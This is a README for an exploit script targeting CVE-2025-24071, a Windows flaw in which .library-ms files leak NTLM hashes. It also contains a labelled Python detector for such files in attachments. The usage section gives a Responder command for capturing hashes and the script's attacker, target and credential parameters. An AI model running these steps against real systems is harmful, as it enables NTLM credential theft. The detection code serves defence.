Python script to execute CVE-2025-24071
# CVE-2025-24071: Microsoft Windows File Explorer Spoofing Vulnerability (script by SilentExploit)
## 📖 Description
This project detects and demonstrates exploitation of a **Windows File Explorer spoofing vulnerability**.
The issue arises from a **Windows library file (`.library-ms`)** containing a network path, either as a direct attachment or embedded in an archive.
When opened, the file can cause Windows to **leak NTLM hashes** to a remote (potentially malicious) network location.
POC: https://imgur.com/a/hEO83Se
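
An added detection example, not part of the original project: a mail or file-gateway check that flags `.library-ms` files, loose or inside ZIP archives, whose location points at a network (UNC) path. It assumes the location is carried in a `<url>` element; the size and depth limits, file names and sample fragments are constructed for illustration.

```python
import io
import re
import zipfile

# <url> element whose value is a UNC path (\\host\share...), case-insensitive.
UNC_URL = re.compile(r"<url>\s*(\\\\[^\\<\s]+\\[^<]*?)\s*</url>", re.I)
MAX_MEMBER = 1 << 20   # skip archive members declared larger than 1 MiB (assumed limit)
MAX_DEPTH = 3          # bound recursion into nested archives (assumed limit)

def remote_locations(data: bytes) -> list:
    """Return UNC paths found in <url> elements of one .library-ms body."""
    # Library files are XML; honour a UTF-16 BOM so the pattern still matches.
    enc = "utf-16" if data[:2] in (b"\xff\xfe", b"\xfe\xff") else "utf-8"
    return UNC_URL.findall(data.decode(enc, errors="replace"))

def scan(name: str, data: bytes, depth: int = 0) -> list:
    """Return (path, unc) pairs for a file or, recursively, a ZIP archive."""
    if name.lower().endswith(".library-ms"):
        return [(name, unc) for unc in remote_locations(data)]
    hits = []
    if depth < MAX_DEPTH and zipfile.is_zipfile(io.BytesIO(data)):
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            for info in zf.infolist():
                if not info.is_dir() and info.file_size <= MAX_MEMBER:
                    hits += scan(f"{name}!{info.filename}", zf.read(info), depth + 1)
    return hits

def demo() -> list:
    """Scan a constructed attachment: a ZIP holding two library fragments."""
    # Constructed fragments, not complete library files. 192.0.2.10 is a
    # documentation address (RFC 5737).
    remote = rb"<libraryDescription><url>\\192.0.2.10\share</url></libraryDescription>"
    local = rb"<libraryDescription><url>C:\Users\Public</url></libraryDescription>"
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("docs/report.library-ms", remote)
        zf.writestr("docs/local.library-ms", local)
    return scan("attachment.zip", buf.getvalue())

if __name__ == "__main__":
    for path, unc in demo():
        print(f"ALERT {path} -> {unc}")
```

Only the fragment with a UNC location is reported; the one pointing at a local folder is not.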
---
## ⚡ Usage
### 1. Start Responder
On your attacking machine, run Responder to capture NTLM hashes:
```bash
sudo responder -I tun0 -wvF
```
### 2. Run the Script
You can configure the script in two ways:
#### ✅ Option A: Edit defaults (easiest)
Modify the default parameters in the script directly.
```python
import argparse

def parse_args():  # enclosing function name assumed; the excerpt shows only its body
    parser = argparse.ArgumentParser()
    parser.add_argument("--attacker-ip", default="10.10.14.14", help="Attacker's IP")  # your IP
    parser.add_argument("--target-ip", default="10.129.232.88", help="Target's IP")  # target IP
    parser.add_argument("--share-name", default="IT", help="SMB share name")  # name of the share you have access to, without the /
    parser.add_argument("--username", default="USERNAME", help="SMB username")  # username of the share owner
    parser.add_argument("--password", default="PASSWORD", help="SMB password")  # password of the share owner
    parser.add_argument("--interface", default="tun0", help="Responder network interface")  # check ifconfig, but tun0 will work if you're on a VPN
    return parser.parse_args()
```
#### ✅ Option B: Run with CLI parameters
Execute with arguments:
```bash
python3 CVE-2025-24071.py \
--attacker-ip <ATTACKER_IP> \
--target-ip <TARGET_IP> \
--share-name <SHARE_NAME> \
--username <USERNAME> \
--password <PASSWORD> \
--interface <INTERFACE>
```